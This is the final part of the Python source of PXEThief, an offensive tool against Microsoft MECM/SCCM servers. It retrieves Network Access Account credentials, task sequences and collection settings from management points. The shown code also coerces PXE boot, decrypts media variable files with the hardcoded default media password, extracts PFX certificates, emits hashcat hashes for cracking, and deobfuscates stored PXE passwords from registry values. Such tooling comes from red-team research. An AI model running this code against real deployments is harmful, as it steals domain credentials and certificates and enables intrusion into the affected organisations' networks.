#Retrieve all available TSs, the NAA config and any identified collection settings and return to parsing function
def make_all_http_requests_and_retrieve_sensitive_policies(CCMClientID,CCMClientIDSignature,CCMClientTimestamp,CCMClientTimestampSignature,clientTokenSignature):
#ClientID is x64UnknownMachineGUID from /SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA request
#print("[+] Retrieving Needed Metadata from SCCM Server...")
sccm_base_url = SCCM_BASE_URL
session = requests.Session()
if USING_TLS:
session.verify = False
session.cert = (CERT_FILE,KEY_FILE)
#requests.get('https://kennethreitz.org', cert=('/path/client.cert', '/path/client.key')) # supporting client certs
if USING_PROXY:
proxies = {"https":'127.0.0.1:8080'}
session.proxies = proxies
#ClientID is x64UnknownMachineGUID from /SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA request
print("[+] Retrieving x64UnknownMachineGUID from MECM MP...")
r = session.get(sccm_base_url + "/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA")
#Parse XML and retrieve x64UnknownMachineGUID
root = ET.fromstring(r.text)
clientID = root.find("UnknownMachines").get("x64UnknownMachineGUID")
clientID = root.find("UnknownMachines").get("x86UnknownMachineGUID")
sitecode = root.find("SITECODE").text
if DUMP_MPKEYINFORMATIONMEDIA_XML:
f = open("MPKEYINFORMATIONMEDIA.xml", "w")
f.write(r.text)
f.close()
#Add UTF-16-LE Byte Order Mark (BOM)
first_payload = b'\xFF\xFE' + ('<Msg><ID/><SourceID>' + clientID + '</SourceID><ReplyTo>direct:OSD</ReplyTo><Body Type="ByteRange" Offset="0" Length="728"/><Hooks><Hook2 Name="clientauth"><Property Name="Token"><![CDATA[ClientToken:' + CCMClientID + ';' + CCMClientTimestamp + '\r\nClientTokenSignature:' + clientTokenSignature +'\r\n]]></Property></Hook2></Hooks><Payload Type="inline"/><TargetEndpoint>MP_PolicyManager</TargetEndpoint><ReplyMode>Sync</ReplyMode></Msg>').encode("utf-16-le")
second_payload = ('<RequestAssignments SchemaVersion="1.00" RequestType="Always" Ack="False" ValidationRequested="CRC"><PolicySource>SMS:' + sitecode + '</PolicySource><ServerCookie/><Resource ResourceType="Machine"/><Identification><Machine><ClientID>' + clientID + '</ClientID><NetBIOSName></NetBIOSName><FQDN></FQDN><SID/></Machine></Identification></RequestAssignments>\r\n').encode("utf-16-le") + b'\x00\x00\x00'
me = MultipartEncoder(fields={'Msg': (None, first_payload, "text/plain; charset=UTF-16"), 'RequestAssignments': second_payload})
print("[+] Requesting policy assignments from MP...")
r = session.request("CCM_POST",sccm_base_url + "/ccm_system/request", data=me, headers={'Content-Type': me.content_type.replace("form-data","mixed")})
multipart_data = MultipartDecoder.from_response(r)
#Get the zlib compressed policy locations and parse out the URLs for NAAConfig and TaskSequence
policy_xml = zlib.decompress(multipart_data.parts[1].content).decode("utf-16-le")
wf_policy_xml = "".join(c for c in policy_xml if c.isprintable())
if DUMP_REPLYASSIGNMENTS_XML:
f = open("ReplyAssignments.xml", "w")
f.write(wf_policy_xml)
f.close()
#Pull relevant configs from RequestAssignments XML
allPoliciesURLs = {}
root = ET.fromstring(wf_policy_xml)
policyAssignments = root.findall("PolicyAssignment")
dedup = 0
for policyAssignment in policyAssignments:
policies = policyAssignment.findall("Policy")
for policy in policies:
if policy.get("PolicyCategory") not in allPoliciesURLs and policy.get("PolicyCategory") is not None:
allPoliciesURLs[policy.get("PolicyCategory")] = policy.find("PolicyLocation").text.replace("http://<mp>",sccm_base_url)
else:
if policy.get("PolicyCategory") is None:
allPoliciesURLs["".join(i for i in policy.get("PolicyID") if i not in "\/:*?<>|")] = policy.find("PolicyLocation").text.replace("http://<mp>",sccm_base_url)
else:
allPoliciesURLs[policy.get("PolicyCategory") + str(dedup)] = policy.find("PolicyLocation").text.replace("http://<mp>",sccm_base_url)
dedup = dedup + 1
print("[+] " + str(len(allPoliciesURLs)) + " policy assignment URLs found!")
headers = {'CCMClientID': CCMClientID, "CCMClientIDSignature" : CCMClientIDSignature, "CCMClientTimestamp" : CCMClientTimestamp, "CCMClientTimestampSignature" : CCMClientTimestampSignature}
if DUMP_POLICIES:
POLICY_FOLDER_PREFIX = SCCM_BASE_URL[7:].lstrip("/").rstrip("/")
#Dump all config XMLs to disk - Uncomment to write to policies/*.xml
policy_folder = os.getcwd() + "/" + POLICY_FOLDER_PREFIX + "_policies/"
os.mkdir(policy_folder)
for category, url in allPoliciesURLs.items():
if category is not None:
print("[+] Requesting " + category + " from: " + url)
content = session.get(url, headers=headers)
f = open(policy_folder + category + ".xml", "wb")
f.write(content.content)
f.close()
colsettings = []
naaconfig = []
tsconfig = []
for category, url in allPoliciesURLs.items():
if "NAAConfig" in category:
print("[+] Requesting Network Access Account Configuration from: " + url)
naaconfig.append(session.get(url, headers=headers))
if "TaskSequence" in category:
print("[+] Requesting Task Sequence Configuration from: " + url)
tsconfig.append(session.get(url, headers=headers))
if "CollectionSettings" in category:
print("[+] Requesting Collection Settings from: " + url)
colsettings.append(session.get(url, headers=headers))
return naaconfig,tsconfig,colsettings
def write_default_config_file():
config = configparser.ConfigParser(allow_no_value=True)
config['SCAPY SETTINGS'] = {}
scapy = config['SCAPY SETTINGS']
scapy["AUTOMATIC_INTERFACE_SELECTION_MODE"] = "1" #implemented
scapy["MANUAL_INTERFACE_SELECTION_BY_ID"] = ""
config['HTTP CONNECTION SETTINGS'] = {}
http = config['HTTP CONNECTION SETTINGS']
http["USE_PROXY"] = "0"
http["USE_TLS"] = "0"
config['GENERAL SETTINGS'] = {}
general = config['GENERAL SETTINGS']
general["SCCM_BASE_URL"] = ""
general["AUTO_EXPLOIT_BLANK_PASSWORD"] = "1" #implemented
with open('settings.ini', 'w') as configfile:
config.write(configfile)
if __name__ == "__main__":
name = r"""
________ ___ ___ _______ _________ ___ ___ ___ _______ ________
|\ __ \|\ \ / /|\ ___ \|\___ ___\\ \|\ \|\ \|\ ___ \ |\ _____\
\ \ \|\ \ \ \/ / | \ __/\|___ \ \_\ \ \\\ \ \ \ \ __/|\ \ \__/
\ \ ____\ \ / / \ \ \_|/__ \ \ \ \ \ __ \ \ \ \ \_|/_\ \ __\
\ \ \___|/ \/ \ \ \_|\ \ \ \ \ \ \ \ \ \ \ \ \ \_|\ \ \ \_|
\ \__\ / /\ \ \ \_______\ \ \__\ \ \__\ \__\ \__\ \_______\ \__\
\|__| /__/ /\ __\ \|_______| \|__| \|__|\|__|\|__|\|_______|\|__|
|__|/ \|__|
"""
print(name)
if len(sys.argv) < 2 or sys.argv[1] == "-h":
print("%s 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1" % sys.argv[0])
print("%s 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address" % sys.argv[0])
print("%s 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file and retrieve sensitive data from MECM DP" % sys.argv[0])
print("%s 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Task Sequence XML file retrieved from a full TS media" % sys.argv[0])
print("%s 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in hashcat" % sys.argv[0])
print("%s 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP" % sys.argv[0])
print("%s 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)" % sys.argv[0])
print("%s 8 - Write new default settings.ini file in PXEThief directory" % sys.argv[0])
print("%s 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'" % sys.argv[0])
elif int(sys.argv[1]) == 10:
print_interface_table()
elif int(sys.argv[1]) == 1:
#Use DHCP to find PXE Server
print("[+] Finding and downloading encrypted media variables file from MECM server...")
configure_scapy_networking(None)
get_pxe_files(None)
elif int(sys.argv[1]) == 2:
#Try to directly access user specified DP
if len(sys.argv) != 3:
print("Usage: %s 2 <ip addess of MECM server>" % sys.argv[0])
sys.exit(0)
print("[+] Generating and downloading encrypted media variables file from MECM server located at " + sys.argv[2])
configure_scapy_networking(sys.argv[2])
get_pxe_files(sys.argv[2])
elif int(sys.argv[1]) == 3:
#Decrypt media variables file using password
print("[+] Attempting to decrypt media variables file and retrieve policies and passwords from MECM Server...")
if not (len(sys.argv) == 4 or len(sys.argv) == 3):
print("Usage: %s 3 <variables-file-name> <Password-guess>" % sys.argv[0])
sys.exit(0)
if len(sys.argv) == 3:
print("[+] User did not supply password. Making use of default MECM media variables password (only works for non-password protected media)")
password = "{BAC6E688-DE21-4ABE-B7FB-C9F54E6DB664}"
else:
password = sys.argv[3]
path = sys.argv[2]
media_variables = decrypt_media_file(path,password)
print("[!] Writing media variables to variables.xml")
write_to_file("variables",media_variables)
#Parse media file in order to pull out PFX password and PFX bytes
root = ET.fromstring(media_variables.encode("utf-16-le"))
smsMediaSiteCode = root.find('.//var[@name="_SMSTSSiteCode"]').text
smsMediaGuid = (root.find('.//var[@name="_SMSMediaGuid"]').text)[:31]
smsTSMediaPFX = binascii.unhexlify(root.find('.//var[@name="_SMSTSMediaPFX"]').text)
filename = smsMediaSiteCode + "_" + smsMediaGuid +"_SMSTSMediaPFX.pfx"
print("[!] Writing _SMSTSMediaPFX to "+ filename + ". Certificate password is " + smsMediaGuid)
write_to_binary_file(filename,smsTSMediaPFX)
if osName == "Windows":
process_pxe_bootable_and_prestaged_media(media_variables)
else:
print("[!] This tool uses win32crypt to retrieve passwords from MECM, which is not available on non-Windows platforms")
elif int(sys.argv[1]) == 4:
print("[+] Attempting to decrypt encrypted media variables file and policy from stand-alone media...")
if not (len(sys.argv) == 4 or len(sys.argv) == 5):
print("Usage: %s 4 <variables-file-name> <policy-file-path> <password>" % sys.argv[0])
sys.exit(0)
if len(sys.argv) == 4:
print("[+] User did not supply password. Making use of default MECM media password")
password = "{BAC6E688-DE21-4ABE-B7FB-C9F54E6DB664}"
else:
password = sys.argv[4]
path = sys.argv[2]
policy_file = sys.argv[3]
if password == "{BAC6E688-DE21-4ABE-B7FB-C9F54E6DB664}":
#If no password is set for Full Media, default password is used for Media Variables and _SMSMediaGuid variable is used for policy password
media_variables = decrypt_media_file(path,password)
root = ET.fromstring(media_variables.encode("utf-16-le"))
smsMediaGuid = root.find('.//var[@name="_SMSMediaGuid"]').text
process_full_media(smsMediaGuid,policy_file)
else:
#If a user supplied password is used, the key derived is used decrypt both Policy.xml and the media variables file
#print(decrypt_media_file(path,password))
process_full_media(password,policy_file)
elif int(sys.argv[1]) == 5:
print("Hashcat hash: " + "$sccm$aes128$" + media_crypto.read_media_variable_file_header(sys.argv[2]).hex())
elif int(sys.argv[1]) == 6:
print("[+] Using MECM PXE Certificate registry key values to retrieve task sequences")
identity = sys.argv[2]
print("identityguid: " + identity)
print("Path to file with identitycert value: " + sys.argv[3])
f = open(sys.argv[3], "r")
cert = f.read()
f.close()
dowload_and_decrypt_policies_using_certificate(identity,cert)
elif int(sys.argv[1]) == 7:
print("[+] Decrypt stored PXE password from SCCM DP registry key Reserved1")
reserved = deobfuscate_credential_string(sys.argv[2])
print("PXE Password: " + reserved[:reserved.rfind('\x00')])
elif int(sys.argv[1]) == 8:
print("[+] Writing new 'settings.ini' file to PXEThief folder with default values")
write_default_config_file()